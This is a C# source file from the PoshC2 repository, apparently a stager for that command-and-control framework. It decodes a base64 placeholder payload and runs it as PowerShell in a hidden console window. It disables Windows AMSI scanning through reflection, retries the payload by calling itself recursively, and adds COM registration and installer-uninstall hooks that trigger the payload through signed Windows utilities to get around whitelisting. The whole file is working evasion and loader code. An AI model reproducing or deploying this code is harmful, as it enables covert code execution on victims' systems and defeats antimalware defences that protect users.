PoshC2_Python/Files/Posh.cs

114 lines
3.5 KiB
C#
Executable File

using System;
using System.Text;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.EnterpriseServices;
public class Program
{
[DllImport("kernel32.dll")]
static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
public const int SW_HIDE = 0;
public const int SW_SHOW = 5;
public static string p = "#REPLACEME#";
public Program() {
try
{
string tt = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(p));
InvokeAutomation(tt);
}
catch
{
Main();
}
}
public static string InvokeAutomation(string cmd)
{
Runspace newrunspace = RunspaceFactory.CreateRunspace();
newrunspace.Open();
RunspaceInvoke scriptInvoker = new RunspaceInvoke(newrunspace);
try
{
var amsi = scriptInvoker.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils");
var amsifield = amsi.GetField("amsiInitFailed", BindingFlags.NonPublic | BindingFlags.Static);
amsifield.SetValue(null, true);
} catch { }
Pipeline pipeline = newrunspace.CreatePipeline();
pipeline.Commands.AddScript(cmd);
Collection<PSObject> results = pipeline.Invoke();
newrunspace.Close();
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject obj in results)
{
stringBuilder.Append(obj);
}
return stringBuilder.ToString().Trim();
}
public static void Main()
{
var handle = GetConsoleWindow();
ShowWindow(handle, SW_HIDE);
try
{
string tt = System.Text.Encoding.Unicode.GetString(System.Convert.FromBase64String(p));
InvokeAutomation(tt);
}
catch
{
Main();
}
}
}
public class Bypass : ServicedComponent
{
[ComRegisterFunction]
public static void RegisterClass ( string key )
{
Program.Main();
}
[ComUnregisterFunction]
public static void UnRegisterClass ( string key )
{
Program.Main();
}
}
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
public override void Uninstall(System.Collections.IDictionary savedState)
{
Program.Main();
}
public static string InvokeAutomation(string cmd)
{
Runspace newrunspace = RunspaceFactory.CreateRunspace();
newrunspace.Open();
RunspaceInvoke scriptInvoker = new RunspaceInvoke(newrunspace);
Pipeline pipeline = newrunspace.CreatePipeline();
pipeline.Commands.AddScript(cmd);
Collection<PSObject> results = pipeline.Invoke();
newrunspace.Close();
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject obj in results)
{
stringBuilder.Append(obj);
}
return stringBuilder.ToString().Trim();
}
}